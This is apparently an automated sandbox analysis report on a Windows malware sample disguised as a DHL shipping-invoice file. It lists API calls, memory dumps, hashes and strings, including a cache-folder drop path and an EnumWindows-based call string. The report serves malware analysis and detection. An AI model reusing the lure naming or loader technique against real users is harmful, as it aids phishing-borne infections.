                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 36851d47f29f4e5f8caad751ec2fdfbff3eb3ab123f48471e652e243bc97ec45
                                                                                                                                                                                                                                      • Instruction ID: 6c8b7a7afc7aeb3e996b6e5dc2b2c32cd2e79b991574bcf3a276c199f91445cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36851d47f29f4e5f8caad751ec2fdfbff3eb3ab123f48471e652e243bc97ec45
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D01232B04100D7DB10DBA4AF4899D73A49B84369B344577E102F11D0D6B9D9416A29
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                      • Opcode ID: 0bc635984c6f466b42bf69b1192a92afab3c6d6232f2671ab24b9074207b237f
                                                                                                                                                                                                                                      • Instruction ID: 4fc8e819a9ec015efa4fb87cb4f3efb4dacce27a9684fd7b71b6c066277d8bf2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bc635984c6f466b42bf69b1192a92afab3c6d6232f2671ab24b9074207b237f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19D0A773F142008BD710DBB8BE8949E73E8E780329330883BE102F10D1E978D8424E2C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,73A4123B,?,73A412DF,00000019,73A411BE,-000000A0), ref: 73A41225
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                                                      • Opcode ID: 65e6a330e7558ba5275de3aa80802a4aaa976f11d8bd1b0729beeb1b7b686440
                                                                                                                                                                                                                                      • Instruction ID: b92568d67642b0a00337665b9ea522144deeb30d66e354e42d5e88af702f86f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65e6a330e7558ba5275de3aa80802a4aaa976f11d8bd1b0729beeb1b7b686440
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BB012B6A00000DFEE00AB6DCC07F343354FB80301F144010FA08C0180C3254C118534
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                                                                        • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040565F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                      • String ID: {
                                                                                                                                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                                                                                                                                      • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                                                                      • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                                                                                      • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                                                                      • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                                                                        • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                                                                        • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                                        • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                                        • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes$Call$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 2624150263-3008770819
                                                                                                                                                                                                                                      • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                                                                      • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 73A4121B: GlobalAlloc.KERNELBASE(00000040,?,73A4123B,?,73A412DF,00000019,73A411BE,-000000A0), ref: 73A41225
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73A41C6B
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 73A41CB3
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 73A41CBD
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A41CD0
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73A41DB2
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73A41DB7
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73A41DBC
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A41FA6
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 73A42140
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 73A421B5
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 73A421C6
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 73A42220
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000808), ref: 73A4223A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 245916457-0
                                                                                                                                                                                                                                      • Opcode ID: eee1469599a9cbab0b5f7842050e11f1def809a5f6a084d7d21e7352acc08318
                                                                                                                                                                                                                                      • Instruction ID: e12639c833e9ae79d839fbc32046cd2fd62258def104601612b6dbe1b9b5258f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee1469599a9cbab0b5f7842050e11f1def809a5f6a084d7d21e7352acc08318
